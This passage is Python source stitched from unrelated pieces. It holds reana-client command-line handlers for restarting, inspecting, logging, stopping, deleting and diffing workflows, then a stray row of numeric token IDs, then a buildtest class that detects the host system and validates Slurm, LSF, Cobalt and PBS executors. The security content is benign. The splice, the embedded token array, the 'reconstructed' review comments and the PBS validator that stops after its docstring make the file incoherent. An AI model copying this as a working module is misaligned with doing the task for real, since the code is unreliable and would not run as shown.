elif "failed" in current_status or "stopped" in current_status:
sys.exit(1)
except Exception as e:
logging.debug(traceback.format_exc())
logging.debug(str(e))
click.echo(
click.style(
"Cannot start workflow {}: \n{}".format(workflow, str(e)), fg="red"
),
err=True,
)
if "invoked_by_subcommand" in ctx.parent.__dict__:
sys.exit(1)
@workflow_execution_group.command("restart")
@add_workflow_option
@add_access_token_options
@check_connection
@click.option(
    "-p",
    "--parameter",
    "parameters",
    multiple=True,
    callback=key_value_to_dict,
    help="Additional input parameters to override "
    "original ones from reana.yaml. "
    "E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
    "-o",
    "--option",
    "options",
    multiple=True,
    callback=key_value_to_dict,
    help="Additional operational options for the workflow execution. "
    "E.g. CACHE=off. (workflow engine - serial) "
    "E.g. --debug (workflow engine - cwl)",
)
@click.option(
    "-f",
    "--file",
    type=click.Path(exists=True, resolve_path=True),
    help="REANA specification file describing the workflow to "
    "execute. [default=reana.yaml]",
)
@click.pass_context
def workflow_restart(
    ctx, workflow, access_token, parameters, options, file
): # noqa: D301
    """Restart previously run workflow.
    The `restart` command allows to restart a previous workflow on the same
    workspace.
    Note that workflow restarting can be used in a combination with operational
    options ``FROM`` and ``TARGET``. You can also pass a modified workflow
    specification with ``-f`` or ``--file`` flag.
    You can furthermore use modified input parameters using `-p` or
    `--parameters` flag and by setting additional operational options using
    `-o` or `--options`. The input parameters and operational options can be
    repetitive.
    Examples: \n
    \t $ reana-client restart -w myanalysis.42 -p sleeptime=10 -p myparam=4 \n
    \t $ reana-client restart -w myanalysis.42 -p myparam=myvalue\n
    \t $ reana-client restart -w myanalysis.42 -o TARGET=gendata\n
    \t $ reana-client restart -w myanalysis.42 -o FROM=fitdata
    """
    from reana_client.utils import get_api_url
    from reana_client.api.client import (
        get_workflow_parameters,
        get_workflow_status,
        start_workflow,
    )
    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for p in ctx.params:
        logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
    # A restart is a regular start request with the "restart" flag set; the
    # server reuses the workspace of the given workflow run.
    parsed_parameters = {
        "input_parameters": parameters,
        "operational_options": options,
        "restart": True,
    }
    if file:
        parsed_parameters["reana_specification"] = load_reana_spec(
            click.format_filename(file)
        )
    if workflow:
        if parameters or options:
            try:
                # Take original parameters from the (possibly overridden)
                # specification file if given, otherwise from the server.
                if "reana_specification" in parsed_parameters:
                    workflow_type = parsed_parameters["reana_specification"][
                        "workflow"
                    ]["type"]
                    original_parameters = (
                        parsed_parameters["reana_specification"]
                        .get("inputs", {})
                        .get("parameters", {})
                    )
                else:
                    response = get_workflow_parameters(workflow, access_token)
                    workflow_type = response["type"]
                    original_parameters = response["parameters"]
                parsed_parameters["operational_options"] = validate_operational_options(
                    workflow_type, parsed_parameters["operational_options"]
                )
                parsed_parameters["input_parameters"] = validate_input_parameters(
                    parsed_parameters["input_parameters"], original_parameters
                )
            except REANAValidationError as e:
                click.secho(e.message, err=True, fg="red")
                sys.exit(1)
            except Exception as e:
                # Non-validation failure: report it but continue, letting the
                # server decide on the submitted parameters.
                click.secho(
                    "Could not apply given input parameters: "
                    "{0} \n{1}".format(parameters, str(e)),
                    err=True,
                )
        try:
            logging.info("Connecting to {0}".format(get_api_url()))
            response = start_workflow(workflow, access_token, parsed_parameters)
            # Rebind `workflow` to the fully qualified "<name>.<run_number>".
            workflow = response["workflow_name"] + "." + str(response["run_number"])
            current_status = get_workflow_status(workflow, access_token).get("status")
            click.secho(
                get_workflow_status_change_msg(workflow, current_status), fg="green"
            )
        except Exception as e:
            logging.debug(traceback.format_exc())
            logging.debug(str(e))
            click.echo(
                click.style(
                    "Cannot start workflow {}: \n{}".format(workflow, str(e)), fg="red"
                ),
                err=True,
            )
            # Propagate failure to a parent command (e.g. `reana-client run`).
            if "invoked_by_subcommand" in ctx.parent.__dict__:
                sys.exit(1)
@workflow_execution_group.command("status")
@add_workflow_option
@click.option(
    "--format",
    "_format",
    multiple=True,
    help="Format output by displaying only certain columns. "
    "E.g. --format name,status.",
)
@click.option(
    "--json",
    "output_format",
    flag_value="json",
    default=None,
    help="Get output in JSON format.",
)
@add_access_token_options
@check_connection
@click.option("-v", "--verbose", count=True, help="Set status information verbosity.")
@click.pass_context
def workflow_status( # noqa: C901
    ctx, workflow, _format, output_format, access_token, verbose
): # noqa: D301
    """Get status of a workflow.
    The `status` command allows to retrieve status of a workflow. The status can
    be created, queued, running, failed, etc. You can increase verbosity or
    filter retrieved information by passing appropriate command-line options.
    Examples: \n
    \t $ reana-client status -w myanalysis.42 \n
    \t $ reana-client status -w myanalysis.42 -v --json
    """
    import tablib
    from reana_client.api.client import get_workflow_status
    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for p in ctx.params:
        logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
    if workflow:
        try:
            if _format:
                # Reduce the parsed filter dicts down to bare column names.
                parsed_filters = parse_format_parameters(_format)
                _format = [item["column_name"] for item in parsed_filters]
            response = get_workflow_status(workflow, access_token)
            headers = ["name", "run_number", "created", "status"]
            verbose_headers = ["id", "user", "command"]
            data = []
            # Normalize single-record responses into a list.
            if not isinstance(response, list):
                response = [response]
            # NOTE(review): the loop variable shadows the `workflow` CLI
            # argument; after the loop it refers to the last response record.
            for workflow in response:
                add_data_from_reponse(workflow, data, headers)
                if verbose:
                    headers += verbose_headers
                    add_verbose_data_from_response(
                        workflow, verbose_headers, headers, data
                    )
            if output_format:
                # Export through tablib when a machine-readable format
                # (currently only JSON) was requested.
                tablib_data = tablib.Dataset()
                tablib_data.headers = headers
                for row in data:
                    tablib_data.append(row)
                if _format:
                    tablib_data = tablib_data.subset(rows=None, cols=list(_format))
                click.echo(tablib_data.export(output_format))
            else:
                click_table_printer(headers, _format, data)
        except Exception as e:
            logging.debug(traceback.format_exc())
            logging.debug(str(e))
            click.echo(
                click.style(
                    "Cannot retrieve the status of a workflow {}: \n{}".format(
                        workflow, str(e)
                    ),
                    fg="red",
                ),
                err=True,
            )
@workflow_execution_group.command("logs")
@add_workflow_option
@click.option("--json", "json_format", count=True, help="Get output in JSON format.")
@add_access_token_options
@click.option(
    "--filter",
    "filters",
    multiple=True,
    help="Filter job logs to include only those steps that match certain filtering criteria. Use --filter name=value pairs. Available filters are compute_backend, docker_img, status and step.",
)
@add_pagination_options
@check_connection
@click.pass_context
def workflow_logs(
    ctx,
    workflow,
    access_token,
    json_format,
    steps=None,
    filters=None,
    page=None,
    size=None,
): # noqa: D301
    """Get workflow logs.
    The `logs` command allows to retrieve logs of running workflow. Note that
    only finished steps of the workflow are returned, the logs of the currently
    processed step is not returned until it is finished.
    Examples: \n
    \t $ reana-client logs -w myanalysis.42
    \t $ reana-client logs -w myanalysis.42 --filter step=1st_step
    """
    from reana_client.api.client import get_workflow_logs
    # Map user-facing filter names onto the keys used in job log records.
    available_filters = {
        "step": "job_name",
        "compute_backend": "compute_backend",
        "docker_img": "docker_img",
        "status": "status",
    }
    # NOTE(review): the ``steps`` parameter is not exposed as a CLI option and
    # is reset here; step names are collected from ``--filter step=...`` pairs.
    steps = []
    chosen_filters = dict()
    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for p in ctx.params:
        logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
    if workflow:
        if filters:
            try:
                for f in filters:
                    key, value = f.split("=")
                    if key not in available_filters:
                        click.echo(
                            click.style(
                                "Error: filter '{}' is not valid.\nAvailable filters are '{}'.".format(
                                    key, "' '".join(sorted(available_filters.keys())),
                                ),
                                fg="red",
                            ),
                            err=True,
                        )
                        sys.exit(1)
                    elif key == "step":
                        # Step filters are passed to the server; the rest are
                        # applied client-side after retrieval.
                        steps.append(value)
                    else:
                        # Case insensitive for compute backends
                        if (
                            key == "compute_backend"
                            and value.lower() in REANA_COMPUTE_BACKENDS
                        ):
                            value = REANA_COMPUTE_BACKENDS[value.lower()]
                        elif key == "status" and value not in RUN_STATUSES:
                            # Fix: removed a stray trailing comma after this
                            # call which turned the statement into a useless
                            # one-element tuple expression.
                            click.secho(
                                "==> ERROR: Input status value {} is not valid. ".format(
                                    value
                                ),
                                err=True,
                                fg="red",
                            )
                            sys.exit(1)
                        chosen_filters[key] = value
            except Exception as e:
                logging.debug(traceback.format_exc())
                logging.debug(str(e))
                click.echo(
                    click.style(
                        "Error: please provide complete --filter name=value pairs, for example --filter status=running.\nAvailable filters are '{}'.".format(
                            "' '".join(sorted(available_filters.keys()))
                        ),
                        fg="red",
                    ),
                    err=True,
                )
                sys.exit(1)
        try:
            response = get_workflow_logs(
                workflow,
                access_token,
                steps=None if not steps else list(set(steps)),
                page=page,
                size=size,
            )
            workflow_logs = json.loads(response["logs"])
            if filters:
                # Apply the remaining (non-step) filters client-side by
                # dropping jobs whose records do not match every filter.
                for key, value in chosen_filters.items():
                    unwanted_steps = [
                        k
                        for k, v in workflow_logs["job_logs"].items()
                        if v[available_filters[key]] != value
                    ]
                    for job_id in unwanted_steps:
                        del workflow_logs["job_logs"][job_id]
            if json_format:
                click.echo(json.dumps(workflow_logs, indent=2))
                sys.exit(0)
            else:
                from reana_client.cli.utils import output_user_friendly_logs
            output_user_friendly_logs(
                workflow_logs, None if not steps else list(set(steps))
            )
        except Exception as e:
            logging.debug(traceback.format_exc())
            logging.debug(str(e))
            click.echo(
                click.style(
                    "Cannot retrieve the logs of a workflow {}: \n{}".format(
                        workflow, str(e)
                    ),
                    fg="red",
                ),
                err=True,
            )
@workflow_execution_group.command("validate")
@click.option(
    "-f",
    "--file",
    type=click.Path(exists=True, resolve_path=True),
    default=get_reana_yaml_file_path,
    help="REANA specification file describing the workflow to "
    "execute. [default=reana.yaml]",
)
@click.option(
    "--environments",
    is_flag=True,
    default=False,
    help="If set, check all runtime environments specified in REANA "
    "specification file. [default=False]",
)
@click.option(
    "--pull",
    is_flag=True,
    default=False,
    callback=requires_environments,
    help="If set, try to pull remote environment image from registry to perform "
    "validation locally. Requires ``--environments`` flag. [default=False]",
)
@click.pass_context
def workflow_validate(ctx, file, environments, pull): # noqa: D301
    """Validate workflow specification file.
    The `validate` command allows to check syntax and validate the reana.yaml
    workflow specification file.
    Examples: \n
    \t $ reana-client validate -f reana.yaml
    """
    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for p in ctx.params:
        logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
    try:
        # Loading the specification performs schema validation; runtime
        # environment checks are skipped unless --environments was given.
        load_reana_spec(
            click.format_filename(file),
            skip_validate_environments=not environments,
            pull_environment_image=pull,
        )
    except (ValidationError, REANAValidationError) as e:
        # Known validation failures carry a user-facing message.
        logging.debug(traceback.format_exc())
        logging.debug(str(e))
        display_message(
            "{0} is not a valid REANA specification:\n{1}".format(
                click.format_filename(file), e.message
            ),
            msg_type="error",
        )
    except Exception as e:
        logging.debug(traceback.format_exc())
        logging.debug(str(e))
        display_message(
            "Something went wrong when trying to validate {}".format(file),
            msg_type="error",
        )
@workflow_execution_group.command("stop")
@click.option(
    "--force",
    "force_stop",
    is_flag=True,
    default=False,
    help="Stop a workflow without waiting for jobs to finish.",
)
@add_workflow_option
@add_access_token_options
@check_connection
@click.pass_context
def workflow_stop(ctx, workflow, force_stop, access_token): # noqa: D301
    """Stop a running workflow.
    The `stop` command allows to hard-stop the running workflow process. Note
    that soft-stopping of the workflow is currently not supported. This command
    should be therefore used with care, only if you are absolutely sure that
    there is no point in continuing the running the workflow.
    Example: \n
    \t $ reana-client stop -w myanalysis.42 --force
    """
    # Fix: removed unused import of get_workflow_status; fixed the
    # "implement" -> "implemented" typo in the user-facing message below.
    from reana_client.api.client import stop_workflow
    # Only forced (hard) stop is supported; refuse to proceed otherwise.
    if not force_stop:
        click.secho(
            "Graceful stop not implemented yet. If you really want to "
            "stop your workflow without waiting for jobs to finish"
            " use: --force option",
            fg="red",
        )
        raise click.Abort()
    if workflow:
        try:
            logging.info("Sending a request to stop workflow {}".format(workflow))
            stop_workflow(workflow, force_stop, access_token)
            click.secho(get_workflow_status_change_msg(workflow, "stopped"), fg="green")
        except Exception as e:
            logging.debug(traceback.format_exc())
            logging.debug(str(e))
            click.secho(
                "Cannot stop workflow {}: \n{}".format(workflow, str(e)),
                fg="red",
                err=True,
            )
@workflow_execution_group.command("run")
@click.option(
    "-f",
    "--file",
    type=click.Path(exists=True, resolve_path=True),
    default=get_reana_yaml_file_path,
    help="REANA specification file describing the workflow to "
    "execute. [default=reana.yaml]",
)
@click.option(
    "-n",
    "--name",
    "-w",
    "--workflow",
    default="",
    callback=validate_workflow_name,
    help='Optional name of the workflow. [default is "workflow"]',
)
@click.option(
    "--skip-validation",
    is_flag=True,
    help="If set, specifications file is not validated before "
    "submitting it's contents to REANA server.",
)
@click.option(
    "-p",
    "--parameter",
    "parameters",
    multiple=True,
    callback=key_value_to_dict,
    help="Additional input parameters to override "
    "original ones from reana.yaml. "
    "E.g. -p myparam1=myval1 -p myparam2=myval2.",
)
@click.option(
    "-o",
    "--option",
    "options",
    multiple=True,
    callback=key_value_to_dict,
    help="Additional operational options for the workflow execution. "
    "E.g. CACHE=off.",
)
@click.option(
    "--follow",
    "follow",
    is_flag=True,
    default=False,
    help="If set, follows the execution of the workflow until termination.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_run(
    ctx, file, name, skip_validation, access_token, parameters, options, follow
): # noqa: D301
    """Shortcut to create, upload, start a new workflow.
    The `run` command allows to create a new workflow, upload its input files
    and start it in one command.
    Examples: \n
    \t $ reana-client run -w myanalysis-test-small -p myparam=mysmallvalue \n
    \t $ reana-client run -w myanalysis-test-big -p myparam=mybigvalue
    """
    # set context parameters for subcommand
    # (the invoked subcommands check `invoked_by_subcommand` via
    # ctx.parent.__dict__ and publish the created workflow's fully qualified
    # name back through `ctx.workflow_name`)
    ctx.invoked_by_subcommand = True
    ctx.workflow_name = ""
    click.secho("[INFO] Creating a workflow...", bold=True)
    ctx.invoke(
        workflow_create,
        file=file,
        name=name,
        skip_validation=skip_validation,
        access_token=access_token,
    )
    click.secho("[INFO] Uploading files...", bold=True)
    ctx.invoke(
        upload_files,
        workflow=ctx.workflow_name,
        filenames=None,
        access_token=access_token,
    )
    click.secho("[INFO] Starting workflow...", bold=True)
    ctx.invoke(
        workflow_start,
        workflow=ctx.workflow_name,
        access_token=access_token,
        parameters=parameters,
        options=options,
        follow=follow,
    )
@workflow_management_group.command("delete")
@click.option(
    "--include-all-runs",
    "all_runs",
    is_flag=True,
    help="Delete all runs of a given workflow.",
)
@click.option(
    "--include-workspace",
    "workspace",
    is_flag=True,
    help="Delete workspace from REANA.",
)
@add_workflow_option
@add_access_token_options
@check_connection
@click.pass_context
def workflow_delete(ctx, workflow, all_runs, workspace, access_token): # noqa: D301
    """Delete a workflow.
    The `delete` command allows to remove workflow runs from the database and
    the workspace. By default, the command removes the workflow and all its
    cached information and hides the workflow from the workflow list. Note that
    workflow workspace will still be accessible until you use
    `--include-workspace` flag. Note also that you can remove all past runs of
    a workflow by specifying `--include-all-runs` flag.
    Example: \n
    \t $ reana-client delete -w myanalysis.42 \n
    \t $ reana-client delete -w myanalysis.42 --include-all-runs \n
    \t $ reana-client delete -w myanalysis.42 --include-workspace
    """
    from reana_client.api.client import delete_workflow, get_workflow_status
    from reana_client.utils import get_api_url
    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for p in ctx.params:
        logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
    if workflow:
        try:
            logging.info("Connecting to {0}".format(get_api_url()))
            delete_workflow(workflow, all_runs, workspace, access_token)
            if all_runs:
                # All runs share the name before the ".run_number" suffix.
                message = "All workflows named '{}' have been deleted.".format(
                    workflow.split(".")[0]
                )
            else:
                message = get_workflow_status_change_msg(workflow, "deleted")
            click.secho(message, fg="green")
        except Exception as e:
            logging.debug(traceback.format_exc())
            logging.debug(str(e))
            click.echo(
                click.style(
                    "Cannot delete workflow {} \n{}".format(workflow, str(e)), fg="red"
                ),
                err=True,
            )
@workflow_management_group.command("diff")
@click.argument(
    "workflow_a",
    default=os.environ.get("REANA_WORKON", None),
    callback=workflow_uuid_or_name,
)
@click.argument("workflow_b", callback=workflow_uuid_or_name)
@click.option(
    "-q",
    "--brief",
    is_flag=True,
    help="If not set, differences in the contents of the files in the two "
    "workspaces are shown.",
)
@click.option(
    "-u",
    "-U",
    "--unified",
    "context_lines",
    type=int,
    default=5,
    help="Sets number of context lines for workspace diff output.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_diff(
    ctx, workflow_a, workflow_b, brief, access_token, context_lines
): # noqa: D301
    """Show diff between two workflows.
    The `diff` command allows to compare two workflows, the workflow_a and
    workflow_b, which must be provided as arguments. The output will show the
    difference in workflow run parameters, the generated files, the logs, etc.
    Examples: \n
    \t $ reana-client diff myanalysis.42 myotheranalysis.43 \n
    \t $ reana-client diff myanalysis.42 myotheranalysis.43 --brief
    """
    from reana_client.api.client import diff_workflows
    logging.debug("command: {}".format(ctx.command_path.replace(" ", ".")))
    for p in ctx.params:
        logging.debug("{param}: {value}".format(param=p, value=ctx.params[p]))
    leading_mark = "==>"
    try:
        response = diff_workflows(
            workflow_a, workflow_b, brief, access_token, str(context_lines)
        )
        if response.get("reana_specification"):
            specification_diff = json.loads(response["reana_specification"])
            # Keep only the specification sections that actually differ.
            nonempty_sections = {k: v for k, v in specification_diff.items() if v}
            if not nonempty_sections:
                click.secho(
                    "{} No differences in REANA specifications.".format(leading_mark),
                    bold=True,
                    fg="yellow",
                )
            # Rename section workflow -> specification
            if "workflow" in nonempty_sections:
                nonempty_sections["specification"] = nonempty_sections.pop("workflow")
            for section, content in nonempty_sections.items():
                click.secho(
                    "{} Differences in workflow {}".format(leading_mark, section),
                    bold=True,
                    fg="yellow",
                )
                print_color_diff(content)
        click.echo("")  # Leave 1 line for separation
        workspace_listing = response.get("workspace_listing")
        # Robustness fix: json.loads() was previously called on the raw
        # .get() result, so a missing "workspace_listing" key raised
        # TypeError and surfaced as a generic "Something went wrong" error.
        workspace_diff = json.loads(workspace_listing) if workspace_listing else None
        if workspace_diff:
            workspace_diff = workspace_diff.splitlines()
            click.secho(
                "{} Differences in workflow workspace".format(leading_mark),
                bold=True,
                fg="yellow",
            )
            print_color_diff(workspace_diff)
    except Exception as e:
        logging.debug(traceback.format_exc())
        logging.debug(str(e))
        click.echo(
            click.style(
                "Something went wrong when trying to get diff:\n{}".format(str(e)),
                fg="red",
            ),
            err=True,
        )
@click.group(help="Workspace interactive commands")
def interactive_group():
    """Group holding the workspace interactive-session commands."""
@interactive_group.command("open")
@add_workflow_option
@click.argument(
    "interactive-session-type",
    metavar="interactive-session-type",
    default=INTERACTIVE_SESSION_TYPES[0],
    type=click.Choice(INTERACTIVE_SESSION_TYPES),
)
@click.option(
    "-i",
    "--image",
    help="Docker image which will be used to spawn the interactive session. "
    "Overrides the default image for the selected type.",
)
@add_access_token_options
@check_connection
@click.pass_context
def workflow_open_interactive_session(
    ctx, workflow, interactive_session_type, image, access_token
): # noqa: D301
    """Open an interactive session inside the workspace.
    The `open` command allows to open interactive session processes on top of
    the workflow workspace, such as Jupyter notebooks. This is useful to
    quickly inspect and analyse the produced files while the workflow is still
    running.
    Examples:\n
    \t $ reana-client open -w myanalysis.42 jupyter
    """
    from reana_client.api.client import open_interactive_session
    if workflow:
        try:
            logging.info("Opening an interactive session on {}".format(workflow))
            interactive_session_configuration = {
                "image": image or None,
            }
            # The server returns the path of the spawned session, which is
            # combined with the server URL and token into a clickable URI.
            path = open_interactive_session(
                workflow,
                access_token,
                interactive_session_type,
                interactive_session_configuration,
            )
            click.secho(
                format_session_uri(
                    reana_server_url=ctx.obj.reana_server_url,
                    path=path,
                    access_token=access_token,
                ),
                fg="green",
            )
            click.echo(
                "It could take several minutes to start the " "interactive session."
            )
        except Exception as e:
            logging.debug(traceback.format_exc())
            logging.debug(str(e))
            click.secho(
                "Interactive session could not be opened: \n{}".format(str(e)),
                fg="red",
                err=True,
            )
    else:
        click.secho("Cannot find workflow {}".format(workflow), fg="red", err=True)
@interactive_group.command("close")
@add_workflow_option
@add_access_token_options
@check_connection
def workflow_close_interactive_session(workflow, access_token): # noqa: D301
    """Close an interactive session.
    The `close` command allows to shut down any interactive sessions that you
    may have running. You would typically use this command after you finished
    exploring data in the Jupyter notebook and after you have transferred any
    code created in your interactive session.
    Examples:\n
    \t $ reana-client close -w myanalysis.42
    """
    from reana_client.api.client import close_interactive_session

    # Guard clause: nothing to close without a workflow to operate on.
    if not workflow:
        click.secho("Cannot find workflow {} ".format(workflow), fg="red", err=True)
        return
    try:
        logging.info("Closing an interactive session on {}".format(workflow))
        close_interactive_session(workflow, access_token)
        click.echo(
            "Interactive session for workflow {}"
            " was successfully closed".format(workflow)
        )
    except Exception as err:
        logging.debug(traceback.format_exc())
        logging.debug(str(err))
        click.secho(
            "Interactive session could not be closed: \n{}".format(str(err)),
            fg="red",
            err=True,
        )
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
198,
2,
770,
2393,
318,
636,
286,
4526,
31574,
13,
198,
2,
15069,
357,
34,
8,
2177,
11,
2864,
327,
28778,
13,
198,
2,
198,
2,
4526,
31574,
318,
1479,
3788,
26,
... | 2.204176 | 20,213 |
import json
import logging
import re
from buildtest.defaults import (
DEFAULT_SETTINGS_FILE,
DEFAULT_SETTINGS_SCHEMA,
USER_SETTINGS_FILE,
)
from buildtest.exceptions import ConfigurationError
from buildtest.schemas.defaults import custom_validator
from buildtest.schemas.utils import load_recipe, load_schema
from buildtest.system import LSF, PBS, Cobalt, Slurm, system
from buildtest.utils.command import BuildTestCommand
from buildtest.utils.file import resolve_path
from buildtest.utils.tools import deep_get
logger = logging.getLogger(__name__)
class SiteConfiguration:
    """This class is an interface to the buildtest configuration file.

    It resolves the path to the configuration file, detects which ``system``
    entry matches the current host, and validates the configuration (including
    the per-scheduler executor definitions) against the settings schema.
    """

    def __init__(self, settings_file=None):
        """Initialize configuration state.

        :param settings_file: optional path to configuration file (e.g. from command line)
        """
        # NOTE(review): reconstructed initializer — it was missing from this
        # chunk, yet the methods below read/append these attributes
        # (``self._file``, ``self.target_config``, the executor lists), so
        # they must be initialized here. Confirm against upstream buildtest.
        self._file = settings_file
        self.config = None
        self._name = None
        self.target_config = None
        self.localexecutors = []
        self.slurmexecutors = []
        self.lsfexecutors = []
        self.cobaltexecutors = []
        self.pbsexecutors = []

    @property
    def file(self):
        """Return path to configuration file."""
        return self._file

    @file.setter
    def file(self, path):
        """Set path to configuration file."""
        # Fix: the original chunk had orphaned ``@property`` and
        # ``@file.setter`` decorators stacked directly on ``resolve()``, which
        # raises NameError at class-definition time. They belong to this
        # property pair; ``resolve()`` is a plain method.
        self._file = path

    def load(self):
        """Loads configuration file"""
        self.config = load_recipe(self._file)

    def resolve(self):
        """This method will resolve path to configuration file. The order of precedence is as follows:
        1. command line argument - Must be valid path
        2. User Configuration: $HOME/.buildtest/config.yml
        3. Default Configuration: $BUILDTEST_ROOT/buildtest/settings/config.yml
        """
        self._file = (
            resolve_path(self._file)
            or resolve_path(USER_SETTINGS_FILE)
            or DEFAULT_SETTINGS_FILE
        )

    def name(self):
        """Return name of matched system from configuration file"""
        return self._name

    def detect_system(self):
        """This method gets current system by setting ``self.target`` by matching ``hostnames`` entry
        in each system list with actual system. We retrieve target hostname and determine which system configuration to use.
        If no system is found we raise an error.
        """
        self.systems = list(self.config["system"].keys())
        host_lookup = {}
        # get hostname fqdn
        cmd = BuildTestCommand("hostname -f")
        cmd.execute()
        hostname = " ".join(cmd.get_output())
        # for every system record we lookup 'hostnames' entry and apply re.match against current hostname. If found we break from loop
        for name in self.systems:
            host_lookup[name] = self.config["system"][name]["hostnames"]
            for host_entry in self.config["system"][name]["hostnames"]:
                if re.match(host_entry, hostname):
                    self.target_config = self.config["system"][name]
                    self._name = name
                    break
        if not self.target_config:
            raise ConfigurationError(
                self.config,
                self.file,
                f"Based on current system hostname: {hostname} we cannot find a matching system {list(self.systems)} based on current hostnames: {host_lookup} ",
            )
        # local executors need no scheduler validation; just record their names
        if self.target_config["executors"].get("local"):
            self.localexecutors = list(self.target_config["executors"]["local"].keys())

    def validate(self, validate_executors=True):
        """This method validates the site configuration with schema"""
        logger.debug(f"Loading default settings schema: {DEFAULT_SETTINGS_SCHEMA}")
        config_schema = load_schema(DEFAULT_SETTINGS_SCHEMA)
        logger.debug(
            f"Validating configuration file with schema: {DEFAULT_SETTINGS_SCHEMA}"
        )
        custom_validator(recipe=self.config, schema=config_schema)
        logger.debug("Validation was successful")
        if validate_executors:
            self._executor_check()
        # the configured module tool must match what is present on the system
        if (
            self.target_config.get("moduletool") != "N/A"
            and self.target_config.get("moduletool") != system.system["moduletool"]
        ):
            raise ConfigurationError(
                self.config,
                self.file,
                f"Cannot find modules_tool: {self.target_config['moduletool']} from configuration, please confirm if you have environment-modules or lmod and specify the appropriate tool.",
            )

    def _executor_check(self):
        """Validate executors for every batch scheduler defined in configuration."""
        # NOTE(review): reconstructed — validate() calls this method but its
        # definition was missing from this chunk. It dispatches to the
        # per-scheduler validators below, which populate self.*executors.
        self._validate_lsf_executors()
        self._validate_slurm_executors()
        self._validate_cobalt_executors()
        self._validate_pbs_executors()

    def _validate_lsf_executors(self):
        """This method validates all LSF executors. We check if queue is available
        and in ``Open:Active`` state.
        """
        lsf_executors = deep_get(self.target_config, "executors", "lsf")
        if not lsf_executors:
            return
        lsf = LSF()
        assert hasattr(lsf, "queues")
        queue_list = []
        valid_queue_state = "Open:Active"
        record = lsf.queues["RECORDS"]
        # retrieve all queues from json record
        for name in record:
            queue_list.append(name["QUEUE_NAME"])
        # check all executors have defined valid queues and check queue state.
        for executor in lsf_executors:
            queue = lsf_executors[executor].get("queue")
            # if queue field is defined check if its valid queue
            if queue:
                if queue not in queue_list:
                    raise ConfigurationError(
                        self.config,
                        self.file,
                        f"{lsf_executors[executor]['queue']} not a valid queue!. Please select one of the following queue: {queue_list}",
                    )
                # check queue record for Status
                for name in record:
                    # skip record until we find matching queue
                    if name["QUEUE_NAME"] != queue:
                        continue
                    queue_state = name["STATUS"]
                    # if state not Open:Active we raise error
                    if not queue_state == valid_queue_state:
                        raise ConfigurationError(
                            self.config,
                            self.file,
                            f"{lsf_executors[executor]['queue']} is in state: {queue_state}. It must be in {valid_queue_state} state in order to accept jobs",
                        )
            self.lsfexecutors.append(executor)

    def _validate_slurm_executors(self):
        """This method will validate slurm executors, we check if partition, qos,
        and cluster fields are valid values by retrieving details from slurm configuration.
        These checks are performed on fields ``partition``, ``qos`` or ``cluster``
        if specified in executor section.
        """
        slurm_executor = deep_get(self.target_config, "executors", "slurm")
        if not slurm_executor:
            return
        slurm = Slurm()
        # make sure slurm attributes slurm.partitions, slurm.qos, slurm.clusters are set
        assert hasattr(slurm, "partitions")
        assert hasattr(slurm, "qos")
        assert hasattr(slurm, "clusters")
        for executor in slurm_executor:
            # if 'partition' key defined check if its valid partition
            if slurm_executor[executor].get("partition"):
                if slurm_executor[executor]["partition"] not in slurm.partitions:
                    raise ConfigurationError(
                        self.config,
                        self.file,
                        f"{slurm_executor[executor]['partition']} not a valid partition!. Please select one of the following partitions: {slurm.partitions}",
                    )
                query = (
                    f"sinfo -p {slurm_executor[executor]['partition']} -h -O available"
                )
                cmd = BuildTestCommand(query)
                cmd.execute()
                part_state = "".join(cmd.get_output())
                part_state = part_state.rstrip()
                # check if partition is in 'up' state. If not we raise an error.
                if part_state != "up":
                    raise ConfigurationError(
                        self.config,
                        self.file,
                        f"{slurm_executor[executor]['partition']} is in state: {part_state}. It must be in 'up' state in order to accept jobs",
                    )
            # check if 'qos' key is valid qos
            if (
                slurm_executor[executor].get("qos")
                and slurm_executor[executor].get("qos") not in slurm.qos
            ):
                raise ConfigurationError(
                    self.config,
                    self.file,
                    f"{slurm_executor[executor]['qos']} not a valid qos! Please select one of the following qos: {slurm.qos}",
                )
            # check if 'cluster' key is valid slurm cluster
            if (
                slurm_executor[executor].get("cluster")
                and slurm_executor[executor].get("cluster") not in slurm.clusters
            ):
                raise ConfigurationError(
                    self.config,
                    self.file,
                    f"{slurm_executor[executor]['cluster']} not a valid slurm cluster! Please select one of the following slurm clusters: {slurm.clusters}",
                )
            self.slurmexecutors.append(executor)

    def _validate_cobalt_executors(self):
        """Validate cobalt queue property by running ```qstat -Ql <queue>``. If
        its a non-zero exit code then queue doesn't exist otherwise it is a valid
        queue.
        """
        cobalt_executor = deep_get(self.target_config, "executors", "cobalt")
        if not cobalt_executor:
            return
        cobalt = Cobalt()
        assert hasattr(cobalt, "queues")
        for executor in cobalt_executor:
            queue = cobalt_executor[executor].get("queue")
            # if queue property defined in cobalt executor name check if it exists
            if queue not in cobalt.queues:
                raise ConfigurationError(
                    self.config,
                    self.file,
                    f"Queue: {queue} does not exist! To see available queues you can run 'qstat -Ql'",
                )
            self.cobaltexecutors.append(executor)

    def _validate_pbs_executors(self):
        """Validate pbs queue property by running by checking if queue is found and
        queue is 'enabled' and 'started' which are two properties found in pbs queue
        configuration that can be retrieved using ``qstat -Q -f -F json``. The output is in
        the following format
        .. code-block:: console
            $ qstat -Q -f -F json
            {
                "timestamp":1615924938,
                "pbs_version":"19.0.0",
                "pbs_server":"pbs",
                "Queue":{
                    "workq":{
                        "queue_type":"Execution",
                        "total_jobs":0,
                        "state_count":"Transit:0 Queued:0 Held:0 Waiting:0 Running:0 Exiting:0 Begun:0 ",
                        "resources_assigned":{
                            "mem":"0kb",
                            "ncpus":0,
                            "nodect":0
                        },
                        "hasnodes":"True",
                        "enabled":"True",
                        "started":"True"
                    }
                }
            }
        """
